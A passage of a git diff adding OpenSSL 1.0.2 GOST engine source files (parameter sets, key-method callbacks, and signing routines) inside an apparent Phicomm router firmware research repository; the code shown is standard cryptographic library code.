+     "3FA8124359F96680B83D1C3EB2C070E5C545C9858D03ECFB744BF8D717717EFC"}
+    ,
+    /*
+     * 1.2.643.2.2.35.3
+     */
+    {NID_id_GostR3410_2001_CryptoPro_C_ParamSet,
+     "9B9F605F5A858107AB1EC85E6B41C8AACF846E86789051D37998F7B9022D7598",
+     "805a",
+     "9B9F605F5A858107AB1EC85E6B41C8AACF846E86789051D37998F7B9022D759B",
+     "9B9F605F5A858107AB1EC85E6B41C8AA582CA3511EDDFB74F02F3A6598980BB9",
+     "0",
+     "41ECE55743711A8C3CBF3783CD08C0EE4D4DC440D4641A8F366E550DFDB3BB67"}
+    ,
+    /*
+     * 1.2.643.2.2.36.0
+     */
+    {NID_id_GostR3410_2001_CryptoPro_XchA_ParamSet,
+     "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFD94",
+     "a6",
+     "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFD97",
+     "FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF6C611070995AD10045841B09B761B893",
+     "1",
+     "8D91E471E0989CDA27DF505A453F2B7635294F2DDF23E3B122ACC99C9E9F1E14"}
+    ,
+    /*
+     * 1.2.643.2.2.36.1
+     */
+    {NID_id_GostR3410_2001_CryptoPro_XchB_ParamSet,
+     "9B9F605F5A858107AB1EC85E6B41C8AACF846E86789051D37998F7B9022D7598",
+     "805a",
+     "9B9F605F5A858107AB1EC85E6B41C8AACF846E86789051D37998F7B9022D759B",
+     "9B9F605F5A858107AB1EC85E6B41C8AA582CA3511EDDFB74F02F3A6598980BB9",
+     "0",
+     "41ECE55743711A8C3CBF3783CD08C0EE4D4DC440D4641A8F366E550DFDB3BB67"}
+    ,
+    {0, NULL, NULL, NULL, NULL, NULL, NULL}
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_params.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_params.h
new file mode 100644
index 0000000..0773cbf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_params.h
@@ -0,0 +1,34 @@
+/**********************************************************************
+ *                        gost_params.h                               *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *       This file is distributed under the same license as OpenSSL   *
+ *                                                                    *
+ *       Declaration of structures used to represent  GOST R 34.10    *
+ *                     parameter sets, defined in RFC 4357                *
+ *         OpenSSL 0.9.9 libraries required to compile and use        *
+ *                              this code                             *
+ **********************************************************************/
+#ifndef GOST_PARAMSET_H
+# define GOST_PARAMSET_H
+typedef struct R3410 {
+    int nid;
+    char *a;
+    char *p;
+    char *q;
+} R3410_params;
+
+extern R3410_params R3410_paramset[];
+
+typedef struct R3410_2001 {
+    int nid;
+    char *a;
+    char *b;
+    char *p;
+    char *q;
+    char *x;
+    char *y;
+} R3410_2001_params;
+
+extern R3410_2001_params R3410_2001_paramset[];
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_pmeth.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_pmeth.c
new file mode 100644
index 0000000..a2c7cf2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_pmeth.c
@@ -0,0 +1,621 @@
+/**********************************************************************
+ *                          gost_pmeth.c                              *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *         This file is distributed under the same license as OpenSSL *
+ *                                                                    *
+ *   Implementation of RFC 4357 (GOST R 34.10) Publick key method     *
+ *       for OpenSSL                                                  *
+ *          Requires OpenSSL 0.9.9 for compilation                    *
+ **********************************************************************/
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/ec.h>
+#include <openssl/x509v3.h>     /* For string_to_hex */
+#include <stdlib.h>
+#include <string.h>
+#include <ctype.h>
+#include "gost_params.h"
+#include "gost_lcl.h"
+#include "e_gost_err.h"
+/* -----init, cleanup, copy - uniform for all algs  ---------------*/
+/* Allocates new gost_pmeth_data structure and assigns it as data */
+static int pkey_gost_init(EVP_PKEY_CTX *ctx)
+{
+    struct gost_pmeth_data *data;
+    EVP_PKEY *pkey = EVP_PKEY_CTX_get0_pkey(ctx);
+    data = OPENSSL_malloc(sizeof(struct gost_pmeth_data));
+    if (!data)
+        return 0;
+    memset(data, 0, sizeof(struct gost_pmeth_data));
+    if (pkey && EVP_PKEY_get0(pkey)) {
+        switch (EVP_PKEY_base_id(pkey)) {
+        case NID_id_GostR3410_94:
+            data->sign_param_nid = gost94_nid_by_params(EVP_PKEY_get0(pkey));
+            break;
+        case NID_id_GostR3410_2001:
+            data->sign_param_nid =
+                EC_GROUP_get_curve_name(EC_KEY_get0_group
+                                        (EVP_PKEY_get0((EVP_PKEY *)pkey)));
+            break;
+        default:
+            return 0;
+        }
+    }
+    EVP_PKEY_CTX_set_data(ctx, data);
+    return 1;
+}
+
+/* Copies contents of gost_pmeth_data structure */
+static int pkey_gost_copy(EVP_PKEY_CTX *dst, EVP_PKEY_CTX *src)
+{
+    struct gost_pmeth_data *dst_data, *src_data;
+    if (!pkey_gost_init(dst)) {
+        return 0;
+    }
+    src_data = EVP_PKEY_CTX_get_data(src);
+    dst_data = EVP_PKEY_CTX_get_data(dst);
+    *dst_data = *src_data;
+    if (src_data->shared_ukm) {
+        dst_data->shared_ukm = NULL;
+    }
+    return 1;
+}
+
+/* Frees up gost_pmeth_data structure */
+static void pkey_gost_cleanup(EVP_PKEY_CTX *ctx)
+{
+    struct gost_pmeth_data *data = EVP_PKEY_CTX_get_data(ctx);
+    if (data->shared_ukm)
+        OPENSSL_free(data->shared_ukm);
+    OPENSSL_free(data);
+}
+
+/* --------------------- control functions  ------------------------------*/
+static int pkey_gost_ctrl(EVP_PKEY_CTX *ctx, int type, int p1, void *p2)
+{
+    struct gost_pmeth_data *pctx =
+        (struct gost_pmeth_data *)EVP_PKEY_CTX_get_data(ctx);
+    switch (type) {
+    case EVP_PKEY_CTRL_MD:
+        {
+            if (EVP_MD_type((const EVP_MD *)p2) != NID_id_GostR3411_94) {
+                GOSTerr(GOST_F_PKEY_GOST_CTRL, GOST_R_INVALID_DIGEST_TYPE);
+                return 0;
+            }
+            pctx->md = (EVP_MD *)p2;
+            return 1;
+        }
+        break;
+
+    case EVP_PKEY_CTRL_GET_MD:
+        *(const EVP_MD **)p2 = pctx->md;
+        return 1;
+
+    case EVP_PKEY_CTRL_PKCS7_ENCRYPT:
+    case EVP_PKEY_CTRL_PKCS7_DECRYPT:
+    case EVP_PKEY_CTRL_PKCS7_SIGN:
+    case EVP_PKEY_CTRL_DIGESTINIT:
+#ifndef OPENSSL_NO_CMS
+    case EVP_PKEY_CTRL_CMS_ENCRYPT:
+    case EVP_PKEY_CTRL_CMS_DECRYPT:
+    case EVP_PKEY_CTRL_CMS_SIGN:
+#endif
+        return 1;
+
+    case EVP_PKEY_CTRL_GOST_PARAMSET:
+        pctx->sign_param_nid = (int)p1;
+        return 1;
+    case EVP_PKEY_CTRL_SET_IV:
+        pctx->shared_ukm = OPENSSL_malloc((int)p1);
+        memcpy(pctx->shared_ukm, p2, (int)p1);
+        return 1;
+    case EVP_PKEY_CTRL_PEER_KEY:
+        if (p1 == 0 || p1 == 1) /* call from EVP_PKEY_derive_set_peer */
+            return 1;
+        if (p1 == 2)            /* TLS: peer key used? */
+            return pctx->peer_key_used;
+        if (p1 == 3)            /* TLS: peer key used! */
+            return (pctx->peer_key_used = 1);
+        return -2;
+    }
+    return -2;
+}
+
+static int pkey_gost_ctrl94_str(EVP_PKEY_CTX *ctx,
+                                const char *type, const char *value)
+{
+    int param_nid = 0;
+    if (!strcmp(type, param_ctrl_string)) {
+        if (!value) {
+            return 0;
+        }
+        if (strlen(value) == 1) {
+            switch (toupper((unsigned char)value[0])) {
+            case 'A':
+                param_nid = NID_id_GostR3410_94_CryptoPro_A_ParamSet;
+                break;
+            case 'B':
+                param_nid = NID_id_GostR3410_94_CryptoPro_B_ParamSet;
+                break;
+            case 'C':
+                param_nid = NID_id_GostR3410_94_CryptoPro_C_ParamSet;
+                break;
+            case 'D':
+                param_nid = NID_id_GostR3410_94_CryptoPro_D_ParamSet;
+                break;
+            default:
+                return 0;
+                break;
+            }
+        } else if ((strlen(value) == 2)
+                   && (toupper((unsigned char)value[0]) == 'X')) {
+            switch (toupper((unsigned char)value[1])) {
+            case 'A':
+                param_nid = NID_id_GostR3410_94_CryptoPro_XchA_ParamSet;
+                break;
+            case 'B':
+                param_nid = NID_id_GostR3410_94_CryptoPro_XchB_ParamSet;
+                break;
+            case 'C':
+                param_nid = NID_id_GostR3410_94_CryptoPro_XchC_ParamSet;
+                break;
+            default:
+                return 0;
+                break;
+            }
+        } else {
+            R3410_params *p = R3410_paramset;
+            param_nid = OBJ_txt2nid(value);
+            if (param_nid == NID_undef) {
+                return 0;
+            }
+            for (; p->nid != NID_undef; p++) {
+                if (p->nid == param_nid)
+                    break;
+            }
+            if (p->nid == NID_undef) {
+                GOSTerr(GOST_F_PKEY_GOST_CTRL94_STR, GOST_R_INVALID_PARAMSET);
+                return 0;
+            }
+        }
+
+        return pkey_gost_ctrl(ctx, EVP_PKEY_CTRL_GOST_PARAMSET,
+                              param_nid, NULL);
+    }
+    return -2;
+}
+
+static int pkey_gost_ctrl01_str(EVP_PKEY_CTX *ctx,
+                                const char *type, const char *value)
+{
+    int param_nid = 0;
+    if (!strcmp(type, param_ctrl_string)) {
+        if (!value) {
+            return 0;
+        }
+        if (strlen(value) == 1) {
+            switch (toupper((unsigned char)value[0])) {
+            case 'A':
+                param_nid = NID_id_GostR3410_2001_CryptoPro_A_ParamSet;
+                break;
+            case 'B':
+                param_nid = NID_id_GostR3410_2001_CryptoPro_B_ParamSet;
+                break;
+            case 'C':
+                param_nid = NID_id_GostR3410_2001_CryptoPro_C_ParamSet;
+                break;
+            case '0':
+                param_nid = NID_id_GostR3410_2001_TestParamSet;
+                break;
+            default:
+                return 0;
+                break;
+            }
+        } else if ((strlen(value) == 2)
+                   && (toupper((unsigned char)value[0]) == 'X')) {
+            switch (toupper((unsigned char)value[1])) {
+            case 'A':
+                param_nid = NID_id_GostR3410_2001_CryptoPro_XchA_ParamSet;
+                break;
+            case 'B':
+                param_nid = NID_id_GostR3410_2001_CryptoPro_XchB_ParamSet;
+                break;
+            default:
+                return 0;
+                break;
+            }
+        } else {
+            R3410_2001_params *p = R3410_2001_paramset;
+            param_nid = OBJ_txt2nid(value);
+            if (param_nid == NID_undef) {
+                return 0;
+            }
+            for (; p->nid != NID_undef; p++) {
+                if (p->nid == param_nid)
+                    break;
+            }
+            if (p->nid == NID_undef) {
+                GOSTerr(GOST_F_PKEY_GOST_CTRL01_STR, GOST_R_INVALID_PARAMSET);
+                return 0;
+            }
+        }
+
+        return pkey_gost_ctrl(ctx, EVP_PKEY_CTRL_GOST_PARAMSET,
+                              param_nid, NULL);
+    }
+    return -2;
+}
+
+/* --------------------- key generation  --------------------------------*/
+
+static int pkey_gost_paramgen_init(EVP_PKEY_CTX *ctx)
+{
+    return 1;
+}
+
+static int pkey_gost94_paramgen(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey)
+{
+    struct gost_pmeth_data *data = EVP_PKEY_CTX_get_data(ctx);
+    DSA *dsa = NULL;
+    if (data->sign_param_nid == NID_undef) {
+        GOSTerr(GOST_F_PKEY_GOST94_PARAMGEN, GOST_R_NO_PARAMETERS_SET);
+        return 0;
+    }
+    dsa = DSA_new();
+    if (!fill_GOST94_params(dsa, data->sign_param_nid)) {
+        DSA_free(dsa);
+        return 0;
+    }
+    EVP_PKEY_assign(pkey, NID_id_GostR3410_94, dsa);
+    return 1;
+}
+
+static int pkey_gost01_paramgen(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey)
+{
+    struct gost_pmeth_data *data = EVP_PKEY_CTX_get_data(ctx);
+    EC_KEY *ec = NULL;
+
+    if (data->sign_param_nid == NID_undef) {
+        GOSTerr(GOST_F_PKEY_GOST01_PARAMGEN, GOST_R_NO_PARAMETERS_SET);
+        return 0;
+    }
+    if (!ec)
+        ec = EC_KEY_new();
+    if (!fill_GOST2001_params(ec, data->sign_param_nid)) {
+        EC_KEY_free(ec);
+        return 0;
+    }
+    EVP_PKEY_assign(pkey, NID_id_GostR3410_2001, ec);
+    return 1;
+}
+
+/* Generates Gost_R3410_94_cp key */
+static int pkey_gost94cp_keygen(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey)
+{
+    DSA *dsa;
+    if (!pkey_gost94_paramgen(ctx, pkey))
+        return 0;
+    dsa = EVP_PKEY_get0(pkey);
+    gost_sign_keygen(dsa);
+    return 1;
+}
+
+/* Generates GOST_R3410 2001 key and assigns it using specified type */
+static int pkey_gost01cp_keygen(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey)
+{
+    EC_KEY *ec;
+    if (!pkey_gost01_paramgen(ctx, pkey))
+        return 0;
+    ec = EVP_PKEY_get0(pkey);
+    gost2001_keygen(ec);
+    return 1;
+}
+
+/* ----------- sign callbacks --------------------------------------*/
+
+static int pkey_gost94_cp_sign(EVP_PKEY_CTX *ctx, unsigned char *sig,
+                               size_t *siglen, const unsigned char *tbs,
+                               size_t tbs_len)
+{
+    DSA_SIG *unpacked_sig = NULL;
+    EVP_PKEY *pkey = EVP_PKEY_CTX_get0_pkey(ctx);
+    if (!siglen)
+        return 0;
+    if (!sig) {
+        *siglen = 64;           /* better to check size of pkey->pkey.dsa-q */
+        return 1;
+    }
+    unpacked_sig = gost_do_sign(tbs, tbs_len, EVP_PKEY_get0(pkey));
+    if (!unpacked_sig) {
+        return 0;
+    }
+    return pack_sign_cp(unpacked_sig, 32, sig, siglen);
+}
+
+static int pkey_gost01_cp_sign(EVP_PKEY_CTX *ctx, unsigned char *sig,
+                               size_t *siglen, const unsigned char *tbs,
+                               size_t tbs_len)
+{
+    DSA_SIG *unpacked_sig = NULL;
+    EVP_PKEY *pkey = EVP_PKEY_CTX_get0_pkey(ctx);
+    if (!siglen)
+        return 0;
+    if (!sig) {
+        *siglen = 64;           /* better to check size of curve order */
+        return 1;
+    }
+    unpacked_sig = gost2001_do_sign(tbs, tbs_len, EVP_PKEY_get0(pkey));
+    if (!unpacked_sig) {
+        return 0;
+    }
+    return pack_sign_cp(unpacked_sig, 32, sig, siglen);
+}
+
+/* ------------------- verify callbacks ---------------------------*/
+
+static int pkey_gost94_cp_verify(EVP_PKEY_CTX *ctx, const unsigned char *sig,
+                                 size_t siglen, const unsigned char *tbs,
+                                 size_t tbs_len)
+{
+    int ok = 0;
+    EVP_PKEY *pub_key = EVP_PKEY_CTX_get0_pkey(ctx);
+    DSA_SIG *s = unpack_cp_signature(sig, siglen);
+    if (!s)
+        return 0;
+    if (pub_key)
+        ok = gost_do_verify(tbs, tbs_len, s, EVP_PKEY_get0(pub_key));
+    DSA_SIG_free(s);
+    return ok;
+}
+
+static int pkey_gost01_cp_verify(EVP_PKEY_CTX *ctx, const unsigned char *sig,
+                                 size_t siglen, const unsigned char *tbs,
+                                 size_t tbs_len)
+{
+    int ok = 0;
+    EVP_PKEY *pub_key = EVP_PKEY_CTX_get0_pkey(ctx);
+    DSA_SIG *s = unpack_cp_signature(sig, siglen);
+    if (!s)
+        return 0;
+#ifdef DEBUG_SIGN
+    fprintf(stderr, "R=");
+    BN_print_fp(stderr, s->r);
+    fprintf(stderr, "\nS=");
+    BN_print_fp(stderr, s->s);
+    fprintf(stderr, "\n");
+#endif
+    if (pub_key)
+        ok = gost2001_do_verify(tbs, tbs_len, s, EVP_PKEY_get0(pub_key));
+    DSA_SIG_free(s);
+    return ok;
+}
+
+/* ------------- encrypt init -------------------------------------*/
+/* Generates ephermeral key */
+static int pkey_gost_encrypt_init(EVP_PKEY_CTX *ctx)
+{
+    return 1;
+}
+
+/* --------------- Derive init ------------------------------------*/
+static int pkey_gost_derive_init(EVP_PKEY_CTX *ctx)
+{
+    return 1;
+}
+
+/* -------- PKEY_METHOD for GOST MAC algorithm --------------------*/
+static int pkey_gost_mac_init(EVP_PKEY_CTX *ctx)
+{
+    struct gost_mac_pmeth_data *data;
+    data = OPENSSL_malloc(sizeof(struct gost_mac_pmeth_data));
+    if (!data)
+        return 0;
+    memset(data, 0, sizeof(struct gost_mac_pmeth_data));
+    EVP_PKEY_CTX_set_data(ctx, data);
+    return 1;
+}
+
+static void pkey_gost_mac_cleanup(EVP_PKEY_CTX *ctx)
+{
+    struct gost_mac_pmeth_data *data = EVP_PKEY_CTX_get_data(ctx);
+    OPENSSL_free(data);
+}
+
+static int pkey_gost_mac_copy(EVP_PKEY_CTX *dst, EVP_PKEY_CTX *src)
+{
+    struct gost_mac_pmeth_data *dst_data, *src_data;
+    if (!pkey_gost_mac_init(dst)) {
+        return 0;
+    }
+    src_data = EVP_PKEY_CTX_get_data(src);
+    dst_data = EVP_PKEY_CTX_get_data(dst);
+    *dst_data = *src_data;
+    return 1;
+}
+
+static int pkey_gost_mac_ctrl(EVP_PKEY_CTX *ctx, int type, int p1, void *p2)
+{
+    struct gost_mac_pmeth_data *data =
+        (struct gost_mac_pmeth_data *)EVP_PKEY_CTX_get_data(ctx);
+
+    switch (type) {
+    case EVP_PKEY_CTRL_MD:
+        {
+            if (EVP_MD_type((const EVP_MD *)p2) != NID_id_Gost28147_89_MAC) {
+                GOSTerr(GOST_F_PKEY_GOST_MAC_CTRL,
+                        GOST_R_INVALID_DIGEST_TYPE);
+                return 0;
+            }
+            data->md = (EVP_MD *)p2;
+            return 1;
+        }
+        break;
+
+    case EVP_PKEY_CTRL_GET_MD:
+        *(const EVP_MD **)p2 = data->md;
+        return 1;
+
+    case EVP_PKEY_CTRL_PKCS7_ENCRYPT:
+    case EVP_PKEY_CTRL_PKCS7_DECRYPT:
+    case EVP_PKEY_CTRL_PKCS7_SIGN:
+        return 1;
+    case EVP_PKEY_CTRL_SET_MAC_KEY:
+        if (p1 != 32) {
+            GOSTerr(GOST_F_PKEY_GOST_MAC_CTRL, GOST_R_INVALID_MAC_KEY_LENGTH);
+            return 0;
+        }
+
+        memcpy(data->key, p2, 32);
+        data->key_set = 1;
+        return 1;
+    case EVP_PKEY_CTRL_DIGESTINIT:
+        {
+            EVP_MD_CTX *mctx = p2;
+            void *key;
+            if (!data->key_set) {
+                EVP_PKEY *pkey = EVP_PKEY_CTX_get0_pkey(ctx);
+                if (!pkey) {
+                    GOSTerr(GOST_F_PKEY_GOST_MAC_CTRL,
+                            GOST_R_MAC_KEY_NOT_SET);
+                    return 0;
+                }
+                key = EVP_PKEY_get0(pkey);
+                if (!key) {
+                    GOSTerr(GOST_F_PKEY_GOST_MAC_CTRL,
+                            GOST_R_MAC_KEY_NOT_SET);
+                    return 0;
+                }
+            } else {
+                key = &(data->key);
+            }
+            return mctx->digest->md_ctrl(mctx, EVP_MD_CTRL_SET_KEY, 32, key);
+        }
+    }
+    return -2;
+}
+
+static int pkey_gost_mac_ctrl_str(EVP_PKEY_CTX *ctx,
+                                  const char *type, const char *value)
+{
+    if (!strcmp(type, key_ctrl_string)) {
+        if (strlen(value) != 32) {
+            GOSTerr(GOST_F_PKEY_GOST_MAC_CTRL_STR,
+                    GOST_R_INVALID_MAC_KEY_LENGTH);
+            return 0;
+        }
+        return pkey_gost_mac_ctrl(ctx, EVP_PKEY_CTRL_SET_MAC_KEY,
+                                  32, (char *)value);
+    }
+    if (!strcmp(type, hexkey_ctrl_string)) {
+        long keylen;
+        int ret;
+        unsigned char *keybuf = string_to_hex(value, &keylen);
+        if (keylen != 32) {
+            GOSTerr(GOST_F_PKEY_GOST_MAC_CTRL_STR,
+                    GOST_R_INVALID_MAC_KEY_LENGTH);
+            OPENSSL_free(keybuf);
+            return 0;
+        }
+        ret = pkey_gost_mac_ctrl(ctx, EVP_PKEY_CTRL_SET_MAC_KEY, 32, keybuf);
+        OPENSSL_free(keybuf);
+        return ret;
+
+    }
+    return -2;
+}
+
+static int pkey_gost_mac_keygen(EVP_PKEY_CTX *ctx, EVP_PKEY *pkey)
+{
+    struct gost_mac_pmeth_data *data = EVP_PKEY_CTX_get_data(ctx);
+    unsigned char *keydata;
+    if (!data->key_set) {
+        GOSTerr(GOST_F_PKEY_GOST_MAC_KEYGEN, GOST_R_MAC_KEY_NOT_SET);
+        return 0;
+    }
+    keydata = OPENSSL_malloc(32);
+    memcpy(keydata, data->key, 32);
+    EVP_PKEY_assign(pkey, NID_id_Gost28147_89_MAC, keydata);
+    return 1;
+}
+
+static int pkey_gost_mac_signctx_init(EVP_PKEY_CTX *ctx, EVP_MD_CTX *mctx)
+{
+    return 1;
+}
+
+static int pkey_gost_mac_signctx(EVP_PKEY_CTX *ctx, unsigned char *sig,
+                                 size_t *siglen, EVP_MD_CTX *mctx)
+{
+    unsigned int tmpsiglen = *siglen; /* for platforms where
+                                       * sizeof(int)!=sizeof(size_t) */
+    int ret;
+    if (!sig) {
+        *siglen = 4;
+        return 1;
+    }
+    ret = EVP_DigestFinal_ex(mctx, sig, &tmpsiglen);
+    *siglen = tmpsiglen;
+    return ret;
+}
+
+/* ----------------------------------------------------------------*/
+int register_pmeth_gost(int id, EVP_PKEY_METHOD **pmeth, int flags)
+{
+    *pmeth = EVP_PKEY_meth_new(id, flags);
+    if (!*pmeth)
+        return 0;
+
+    switch (id) {
+    case NID_id_GostR3410_94:
+        EVP_PKEY_meth_set_ctrl(*pmeth, pkey_gost_ctrl, pkey_gost_ctrl94_str);
+        EVP_PKEY_meth_set_keygen(*pmeth, NULL, pkey_gost94cp_keygen);
+        EVP_PKEY_meth_set_sign(*pmeth, NULL, pkey_gost94_cp_sign);
+        EVP_PKEY_meth_set_verify(*pmeth, NULL, pkey_gost94_cp_verify);
+        EVP_PKEY_meth_set_encrypt(*pmeth,
+                                  pkey_gost_encrypt_init,
+                                  pkey_GOST94cp_encrypt);
+        EVP_PKEY_meth_set_decrypt(*pmeth, NULL, pkey_GOST94cp_decrypt);
+        EVP_PKEY_meth_set_derive(*pmeth,
+                                 pkey_gost_derive_init, pkey_gost94_derive);
+        EVP_PKEY_meth_set_paramgen(*pmeth, pkey_gost_paramgen_init,
+                                   pkey_gost94_paramgen);
+        break;
+    case NID_id_GostR3410_2001:
+        EVP_PKEY_meth_set_ctrl(*pmeth, pkey_gost_ctrl, pkey_gost_ctrl01_str);
+        EVP_PKEY_meth_set_sign(*pmeth, NULL, pkey_gost01_cp_sign);
+        EVP_PKEY_meth_set_verify(*pmeth, NULL, pkey_gost01_cp_verify);
+
+        EVP_PKEY_meth_set_keygen(*pmeth, NULL, pkey_gost01cp_keygen);
+
+        EVP_PKEY_meth_set_encrypt(*pmeth,
+                                  pkey_gost_encrypt_init,
+                                  pkey_GOST01cp_encrypt);
+        EVP_PKEY_meth_set_decrypt(*pmeth, NULL, pkey_GOST01cp_decrypt);
+        EVP_PKEY_meth_set_derive(*pmeth,
+                                 pkey_gost_derive_init, pkey_gost2001_derive);
+        EVP_PKEY_meth_set_paramgen(*pmeth, pkey_gost_paramgen_init,
+                                   pkey_gost01_paramgen);
+        break;
+    case NID_id_Gost28147_89_MAC:
+        EVP_PKEY_meth_set_ctrl(*pmeth, pkey_gost_mac_ctrl,
+                               pkey_gost_mac_ctrl_str);
+        EVP_PKEY_meth_set_signctx(*pmeth, pkey_gost_mac_signctx_init,
+                                  pkey_gost_mac_signctx);
+        EVP_PKEY_meth_set_keygen(*pmeth, NULL, pkey_gost_mac_keygen);
+        EVP_PKEY_meth_set_init(*pmeth, pkey_gost_mac_init);
+        EVP_PKEY_meth_set_cleanup(*pmeth, pkey_gost_mac_cleanup);
+        EVP_PKEY_meth_set_copy(*pmeth, pkey_gost_mac_copy);
+        return 1;
+    default:                   /* Unsupported method */
+        return 0;
+    }
+    EVP_PKEY_meth_set_init(*pmeth, pkey_gost_init);
+    EVP_PKEY_meth_set_cleanup(*pmeth, pkey_gost_cleanup);
+
+    EVP_PKEY_meth_set_copy(*pmeth, pkey_gost_copy);
+    /*
+     * FIXME derive etc...
+     */
+
+    return 1;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_sign.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_sign.c
new file mode 100644
index 0000000..0116e47
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ccgost/gost_sign.c
@@ -0,0 +1,320 @@
+/**********************************************************************
+ *                          gost_sign.c                               *
+ *             Copyright (c) 2005-2006 Cryptocom LTD                  *
+ *         This file is distributed under the same license as OpenSSL *
+ *                                                                    *
+ *       Implementation of GOST R 34.10-94 signature algorithm        *
+ *       for OpenSSL                                                  *
+ *          Requires OpenSSL 0.9.9 for compilation                    *
+ **********************************************************************/
+#include <string.h>
+#include <openssl/rand.h>
+#include <openssl/bn.h>
+#include <openssl/dsa.h>
+#include <openssl/evp.h>
+
+#include "gost_params.h"
+#include "gost_lcl.h"
+#include "e_gost_err.h"
+
+#ifdef DEBUG_SIGN
+void dump_signature(const char *message, const unsigned char *buffer,
+                    size_t len)
+{
+    size_t i;
+    fprintf(stderr, "signature %s Length=%d", message, len);
+    for (i = 0; i < len; i++) {
+        if (i % 16 == 0)
+            fputc('\n', stderr);
+        fprintf(stderr, " %02x", buffer[i]);
+    }
+    fprintf(stderr, "\nEnd of signature\n");
+}
+
+void dump_dsa_sig(const char *message, DSA_SIG *sig)
+{
+    fprintf(stderr, "%s\nR=", message);
+    BN_print_fp(stderr, sig->r);
+    fprintf(stderr, "\nS=");
+    BN_print_fp(stderr, sig->s);
+    fprintf(stderr, "\n");
+}
+
+#else
+
+# define dump_signature(a,b,c)
+# define dump_dsa_sig(a,b)
+#endif
+
+/*
+ * Computes signature and returns it as DSA_SIG structure
+ */
+DSA_SIG *gost_do_sign(const unsigned char *dgst, int dlen, DSA *dsa)
+{
+    BIGNUM *k = NULL, *tmp = NULL, *tmp2 = NULL;
+    DSA_SIG *newsig = DSA_SIG_new();
+    BIGNUM *md = hashsum2bn(dgst);
+    /* check if H(M) mod q is zero */
+    BN_CTX *ctx = BN_CTX_new();
+    BN_CTX_start(ctx);
+    if (!newsig) {
+        GOSTerr(GOST_F_GOST_DO_SIGN, GOST_R_NO_MEMORY);
+        goto err;
+    }
+    tmp = BN_CTX_get(ctx);
+    k = BN_CTX_get(ctx);
+    tmp2 = BN_CTX_get(ctx);
+    BN_mod(tmp, md, dsa->q, ctx);
+    if (BN_is_zero(tmp)) {
+        BN_one(md);
+    }
+    do {
+        do {
+            /*
+             * Generate random number k less than q
+             */
+            BN_rand_range(k, dsa->q);
+            /* generate r = (a^x mod p) mod q */
+            BN_mod_exp(tmp, dsa->g, k, dsa->p, ctx);
+            if (!(newsig->r))
+                newsig->r = BN_new();
+            BN_mod(newsig->r, tmp, dsa->q, ctx);
+        }
+        while (BN_is_zero(newsig->r));
+        /* generate s = (xr + k(Hm)) mod q */
+        BN_mod_mul(tmp, dsa->priv_key, newsig->r, dsa->q, ctx);
+        BN_mod_mul(tmp2, k, md, dsa->q, ctx);
+        if (!newsig->s)
+            newsig->s = BN_new();
+        BN_mod_add(newsig->s, tmp, tmp2, dsa->q, ctx);
+    }
+    while (BN_is_zero(newsig->s));
+ err:
+    BN_free(md);
+    BN_CTX_end(ctx);
+    BN_CTX_free(ctx);
+    return newsig;
+}
+
+/*
+ * Packs signature according to Cryptocom rules
+ * and frees up DSA_SIG structure
+ */
+/*-
+int pack_sign_cc(DSA_SIG *s,int order,unsigned char *sig, size_t *siglen)
+        {
+        *siglen = 2*order;
+        memset(sig,0,*siglen);
+        store_bignum(s->r, sig,order);
+        store_bignum(s->s, sig + order,order);
+        dump_signature("serialized",sig,*siglen);
+        DSA_SIG_free(s);
+        return 1;
+        }
+*/
+/*
+ * Packs signature according to Cryptopro rules
+ * and frees up DSA_SIG structure
+ */
+int pack_sign_cp(DSA_SIG *s, int order, unsigned char *sig, size_t *siglen)
+{
+    *siglen = 2 * order;
+    memset(sig, 0, *siglen);
+    store_bignum(s->s, sig, order);
+    store_bignum(s->r, sig + order, order);
+    dump_signature("serialized", sig, *siglen);
+    DSA_SIG_free(s);
+    return 1;
+}
+
+/*
+ * Verifies signature passed as DSA_SIG structure
+ *
+ */
+
+int gost_do_verify(const unsigned char *dgst, int dgst_len,
+                   DSA_SIG *sig, DSA *dsa)
+{
+    BIGNUM *md, *tmp = NULL;
+    BIGNUM *q2 = NULL;
+    BIGNUM *u = NULL, *v = NULL, *z1 = NULL, *z2 = NULL;
+    BIGNUM *tmp2 = NULL, *tmp3 = NULL;
+    int ok;
+    BN_CTX *ctx = BN_CTX_new();
+
+    BN_CTX_start(ctx);
+    if (BN_cmp(sig->s, dsa->q) >= 1 || BN_cmp(sig->r, dsa->q) >= 1) {
+        GOSTerr(GOST_F_GOST_DO_VERIFY, GOST_R_SIGNATURE_PARTS_GREATER_THAN_Q);
+        return 0;
+    }
+    md = hashsum2bn(dgst);
+
+    tmp = BN_CTX_get(ctx);
+    v = BN_CTX_get(ctx);
+    q2 = BN_CTX_get(ctx);
+    z1 = BN_CTX_get(ctx);
+    z2 = BN_CTX_get(ctx);
+    tmp2 = BN_CTX_get(ctx);
+    tmp3 = BN_CTX_get(ctx);
+    u = BN_CTX_get(ctx);
+
+    BN_mod(tmp, md, dsa->q, ctx);
+    if (BN_is_zero(tmp)) {
+        BN_one(md);
+    }
+    BN_copy(q2, dsa->q);
+    BN_sub_word(q2, 2);
